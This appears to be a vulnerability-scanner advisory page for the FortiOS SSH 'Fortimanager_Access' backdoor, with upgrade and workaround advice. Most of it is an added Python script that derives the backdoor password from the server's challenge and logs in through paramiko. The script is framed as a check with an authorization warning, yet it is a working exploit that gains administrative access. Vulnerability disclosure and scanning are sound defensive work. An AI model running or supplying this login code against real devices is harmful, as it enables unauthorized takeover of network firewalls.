Fortinet FortiOS SSH Undocumented Interactive Login Vulnerability
Severity: Critical
Nessus Plugin ID 87896
Synopsis
The SSH server running on the remote host can be logged into using default SSH credentials.
Description
The SSH server running on the remote host can be logged into using default SSH credentials. The 'Fortimanager_Access' account accepts a password derived from the string 'FGTAbc11*xy+Qqz27' by a hash calculation that is publicly known, so no secret is needed to compute it. A remote attacker can exploit this to gain administrative access to the remote host.
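The check below is an added example and is not part of the plugin page or Fortinet's code. It reproduces the password derivation from the public January 2016 disclosure of this backdoor: the FortiOS sshd sends a challenge as the keyboard-interactive prompt, and the accepted answer is 'AK1' followed by the base64 SHA-1 of twelve NUL bytes, the challenge, the static string from the description, and a fixed 20-byte suffix. The suffix bytes and the prompt layout come from that disclosure, not from this page; the live check assumes the third-party paramiko library.

```python
import base64
import hashlib
import sys

# Backdoor account and static string named in the plugin description.
BACKDOOR_USER = "Fortimanager_Access"
STATIC_STRING = b"FGTAbc11*xy+Qqz27"

# Fixed 20-byte suffix from the January 2016 public proof of concept
# (assumed from that disclosure; it does not appear on the plugin page).
SUFFIX = bytes.fromhex("a388ba2e424cb04a537930c13107cc3fa1dffe5e")


def backdoor_response(challenge: str) -> str:
    """Compute the keyboard-interactive answer for one server prompt.

    answer = 'AK1' + base64(SHA-1(12 x NUL || challenge || STATIC_STRING || SUFFIX))
    The challenge is whatever text the server put in the first prompt.
    """
    data = b"\x00" * 12 + challenge.encode("utf-8") + STATIC_STRING + SUFFIX
    digest = hashlib.sha1(data).digest()
    return "AK1" + base64.b64encode(digest).decode("ascii")


def check_host(host: str, port: int = 22, timeout: float = 10.0) -> bool:
    """Attempt the backdoor login; return True only if the server accepts it.

    paramiko is imported here so backdoor_response() works without it.
    """
    import paramiko  # third-party dependency, only needed for the live check

    transport = paramiko.Transport((host, port))
    try:
        transport.start_client(timeout=timeout)

        def handler(title, instructions, prompt_list):
            # prompt_list is a list of (prompt_text, echo) pairs; the
            # challenge is the text of the first prompt.
            return [backdoor_response(prompt_list[0][0])]

        transport.auth_interactive(BACKDOOR_USER, handler)
        return transport.is_authenticated()
    except paramiko.SSHException:
        # Authentication refused or handshake failed: not vulnerable (or unreachable).
        return False
    finally:
        transport.close()


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "192.0.2.1"  # constructed placeholder
    print("vulnerable" if check_host(target) else "not vulnerable")
```

A successful return from check_host() is an actual administrative login, so run it only against devices you are authorized to test; a False result from an unreachable host is not evidence that the fix is in place, so confirm the version separately.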
Solution
Upgrade to Fortinet FortiOS 4.3.17 / 5.0.8 / 5.2.x / 5.4.x or later.
Alternatively, as a workaround, disable administrative access via SSH on all interfaces.